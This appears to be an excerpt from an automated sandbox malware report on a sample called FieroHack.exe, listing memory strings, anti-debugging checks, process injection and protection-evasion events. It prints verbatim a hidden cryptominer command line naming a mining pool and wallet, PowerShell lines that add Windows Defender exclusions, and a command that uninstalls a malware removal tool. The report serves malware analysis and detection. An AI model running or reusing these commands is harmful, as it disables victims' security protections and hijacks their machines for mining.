      Source: explorer.exe, 00000045.00000002.4114240353.0000000000A91000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLOUT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXEITY\SYSTEMOM
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLOUT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000A91000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:9000--USER=45WBQXGMBXAX8NMDEUKLMEHGJXU16TC6MI1TCMZDHVCPJXSD7XZE2VGJJMBBQ4MH7U5HS95LWWZFB9ZOUYYOYXGA9O1ZH8G.RIGAS--PASS=RIGAS--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=QKRJWVGKUTVB.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLOUT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--NICEHASH--TLS--CINIT-IDLE-WAIT=15--CINIT-IDLE-CPU=80--CINIT-ID=TOMKNVIVMVOOUNWV
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000045.00000002.4114240353.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000045.00000002.4114240353.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLOUT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Memory allocated: 25B0000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Memory allocated: 2740000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Memory allocated: 4740000 memory reserve | memory write watch
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe; File opened / queried: VBoxGuest
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6117
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3697
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6119
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3712
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe; Dropped PE file which has not been started: C:\Windows\Temp\qkrjwvgkutvb.sys
      Source: C:\Windows\System32\conhost.exe; API coverage: 1.2 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5316; Thread sleep count: 6117 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956; Thread sleep count: 3697 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 824; Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Users\user\AppData\Roaming\Sirus.exe TID: 7056; Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7008; Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 2332; Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336; Thread sleep count: 6119 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064; Thread sleep count: 3712 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248; Thread sleep time: -6456360425798339s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2228; Thread sleep count: 60 > 30
      Source: C:\Windows\explorer.exe TID: 2228; Thread sleep count: 46 > 30
      Source: C:\Users\user\AppData\Roaming\WeMod.exe; File opened: PhysicalDrive0
      Source: C:\Windows\explorer.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (15 identical entries)
      Source: C:\Users\user\Desktop\FieroHack.exe; Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\FieroHack.exe; Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\FieroHack.exe; Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\Sirus.exe; Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
      Source: leirdnhqqedj.exe; Binary or memory string: 7BGRrBv2duFigTpjrFABMNHL4OW9tHbkekllagHj901K/K4gUIIF87I95fTg76xUkl4zn9NFgFF5WDGKG21pSuugN1YjQ8t5J4A6wjbZagk6TZA5qEMuDxomL6h8Vf0PrXWxUkxv0XoDppPCbk3T7n+VuUFp9SkLu0C49cMC67LHn2kceGtEOlRTFf+SEO3KGttST9u91a05s814f5kecfsaMTB1yYiaqF4GBWs5YtfyCWXlDoYQFQ1W0L+1jZsjQPHx
      Source: leirdnhqqedj.exe; Binary or memory string: KvF/Jo0dm0BW98eGOb+/o7oaW6Dq6QmTlw2UTABOdru70TeFUXcI3wdAUSnxOus/CZ1MfA6v/bOdshgFsQlLEPjkOAZRwdHQj/O5gSt5TJK6fB7TrMCsMdodnBCMVOZaXvbhAgwZXp5wunbQCuepSGmVYrKFOoJJU3rtkWKtVXk/biAz6FsbsdzBVttqie6cw6a60d8dHosTBhgXASpv9BBlzKEi4XBjwNsinMx5a/TSD5vc4YiTOd8GzxzZgUXSmfzC
      Source: leirdnhqqedj.exe; Binary or memory string: jRkCs7xJoXMtEB3ssw3IHChbBGDAaoEbNZ/wqJgHlX31jYb1SAShz6vUMmsGkLzHamXIzyaSKFGWfMJ5dWolQZRhULg1VaoJwpHEiYSRnJeI5ZAZMI3zsq1xVT8c+wkX25yHZLmCLG8PgBu0bTWkFuzFfREpCRG329BD1BvmBfGr1/fHTbC/7dOrm2in/fbpeE+/oTd8Pe3K0QlDV78VgqqvUPD6p9NVjZiPN18sHttS3HGfSB1cEI7IhpwH4QHV8Ga5
      Source: leirdnhqqedj.exe; Binary or memory string: o227l4R7iYoAv6piAj1HoR+rx8YSKmjETutr0GRDjzil2XxPiy974qDzoGt6gCjemVth/yCXVW8+NfFbdL0TupLCCGlgWamzbCjrK5SyPLAzZfOTZOZmYSHtCWYbg9VmcI1MugHbfnxBf3DO6bZcpM5vLlzUsNJTZAZLal87CwD4P5hFY0eWLWCO1OCFtNh7CD627zq1W3sUXHVH+GyVNq72DcEarLp1WH3CxSerTE9hmd3ky8Vslnejnli4lcbK+cdp
      Source: leirdnhqqedj.exe, 0000002B.00000002.2202453826.00000238BC5DC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\VBoxGuestData@?h
      Source: leirdnhqqedj.exe; Binary or memory string: nsDe0Ggyt0Ha5V3kp09VNZsVg6iS31osvMo+1/wqxFXopchgfsd5JHjWujzpVZAL6GKs/k2IRg5njdUDsvDFdjUoUNrZgY/CHcg2ep1sqllfoFgIHmrtWLYUTG9s4Jf0Uqgm2i4qUVjeJ14mHZcetPqykhhxEC8vA76zFLhVTQ7zHAfRP4CQUPzZsa73PgxItZ+7r9JV1SrpLbKRY1PNSDsRFcwUzc+GbEFJV1VsO4bpM7Q29mAFoYVcO2hQEwl2WAVZ
      Source: leirdnhqqedj.exe; Binary or memory string: amtIJL3IqYciY894Q7d0NGtbOQm4ANV/JUdgG38UePLRmruP7mBUznRNdKNKyW4CA6/CfgFOeMhmtl1FqBAkhU9esESCeDZdmlCX/bsndCdEW1kga0xfaR9syGzPXWDaVrN2OLNN62Xs8kwyFnm9aY8InWpauWC5XoAPJ383VmCIu40mMnkPZhpi9lidugzIYv1qx1tGrn5kWU2Ga474AGuVJtZeeUSI/NuXJCprimEWNvuLWYZjtmeDYPeA4iowE9KL
      Source: leirdnhqqedj.exe; Binary or memory string: WQZPjlW/g20YOrpLFJnMCPkoIOYXMaFV/K2txsAtZYcLYAsiMYTwnXYZBJeyZNlxjepbdniPpbHCk8Ak4p3vUtVfg57MsncJX6nl5TDhqx+d7NtTjQzXxgSVwIvSspnJqNPcgS6mU1nQ6/KffCDfPNPNvMciZJedzJOfEoKWlvvY8liELqDl4XSkbhdx7s79YNJ2ooiEE1zQ7tmZZyi9i2zi3o/spUHV+Yzv7X2gq2H8tFZS0bW21mIU3m6ou3TfZKCQ
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: \qemu-ga.exe`,^q
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: \qemu-ga.exe
      Source: leirdnhqqedj.exe; Binary or memory string: fRUAsheH0RuZxlqUnW2PnTPVGTXxqxuXvNc7r5POGoWuV3+KMo5sik8zYIJu6RR2F3+fw16ZmK7E1v2c2koTthRiQNR9+9S51QNaRZodLMcUsAQJRaVMCiNI75i8JHNqxwzPN5gCXeJenp1THKhnQ54Q3xgg1GhhWl4aGd+c4JMrXxodUW4iVO7eWh+anl/TKaVSnljeXtbZSum/GEgg4DocAEJTXnMZ0BKQL9sfDZqaT6uJkyinUozMVpcR1frHVH9E
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: \qemu-ga.exe@\^q
      Source: svchost.exe, 00000023.00000002.2203744663.0000020AF7A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.2205200272.0000020AFD259000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000045.00000002.4114240353.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000045.00000002.4114240353.0000000000A96000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
      Source: leirdnhqqedj.exe; Binary or memory string: VoUZ51ruD6mnE1JoLkZq94SS7O8pWGS09/E2LlU3YSh0B2Ylg4mnOQsGmCJu9xM83l0Jp+1kIVLcLmLSwv4DQH5i+pVeDY+MxfZem27O1luJfGYWBhtZztbwXIJLdu6OVND7XrdLgyGajD+JIeU8t2phcqAkrxiGQ6qQeMUGF2b+KiwFd+fRdbSPtWiafFQBlo1+3Qy7+UPJxJHmkOSnqMnmXS+rkQEXx+I/YPBxAhXlZP4GHPM1LLeMMtD0W7Srp5d3
      Source: leirdnhqqedj.exe; Binary or memory string: NR1r5icKIYZmodJh4UZzu/U59y9Eu4oKFRI/piZRm/4xahkevcDZ907/Vuge4QjMhaN3JdNL/A42B9/qEicnbxmbq89HFyZv8mmLQSVtaZopfghGbJqbqCFX6q/chB7nLeHYKRTkaHdns4axiFl49nVmCifWhmTuuXNRZbXLhGXzm9Tl+5Do2ney7oLmxPdpPfYXkySjVkVZPIBTCw6bRK1IF5ErAKhQP6rb2n7nbJbEbpsYFtwJ624LGqc1wspqBDD2
      Source: leirdnhqqedj.exe; Binary or memory string: S07hGfs58Hs1wqlTM0A9pwfiauFKGXiJuTE0/9rZQVhEIeE+4mbzAj9CJfw1QKZX99RqTQcBIYnxT01VoUS02u0r/GD/1KdMMwkkpZj/O01BGRRGYSp99MKEVEBkP6o39H7r2TVRK+b1Cb7V6ss7UQwhLUZi4t1OeYRdaycsqudw60rZUDnpLPUE/NO/ADscVDi3RvzEcUJ5aTk3apmqY+dMQ9k5+yL/9fbIMloAZT23UipG2nhND3kjKrH+mVJRSwah
      Source: leirdnhqqedj.exe, 0000002B.00000002.2202866805.00000238BC7C0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: \\.\VBoxGuest
      Source: C:\Users\user\Desktop\FieroHack.exeAPI call chain: ExitProcess graph end nodegraph_0-3273
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Code function: 7_2_025B1298 CheckRemoteDebuggerPresent, | 7_2_025B1298
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Thread information set: HideFromDebugger
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Open window title or class name: ollydbg
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Process queried: DebugObjectHandle
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Process queried: DebugFlags
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Process queried: DebugPort
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Process queried: DebugPort
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Process queried: DebugObjectHandle
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Process queried: DebugFlags
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Process queried: DebugPort
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\conhost.exe | Code function: 67_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, | 67_2_0000000140001160
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exe | Network Connect: 141.94.96.144 9000
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | NtQueryInformationProcess: Indirect: 0x7FF617904D73
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | NtQueryInformationProcess: Indirect: 0x7FF617904EA6
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | NtSetInformationThread: Indirect: 0x7FF6EE345113
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | NtQuerySystemInformation: Indirect: 0x7FF6EE345002
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | NtQuerySystemInformation: Indirect: 0x7FF617905002
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | NtQueryInformationProcess: Indirect: 0x7FF6EE344E0B
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | NtSetInformationThread: Indirect: 0x7FF617905113
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | NtQueryInformationProcess: Indirect: 0x7FF6EE344EA6
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | NtQueryInformationProcess: Indirect: 0x7FF617904E0B
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | NtQueryInformationProcess: Indirect: 0x7FF6EE344D73
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Memory written: PID: 2736 base: 140000000 value: 4D
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Memory written: PID: 2736 base: 140001000 value: NU
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Memory written: PID: 2736 base: 140674000 value: DF
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Memory written: PID: 2736 base: 140847000 value: 00
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Memory written: PID: 2736 base: 819010 value: 00
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Thread register set: target process: 3180
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Thread register set: target process: 2736
      Source: C:\Users\user\AppData\Roaming\WeMod.exe | Thread register set: 4340 501
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | Process created: C:\Windows\explorer.exe explorer.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002A14000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: GetProgmanWindow
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002A14000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SetProgmanWindow
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
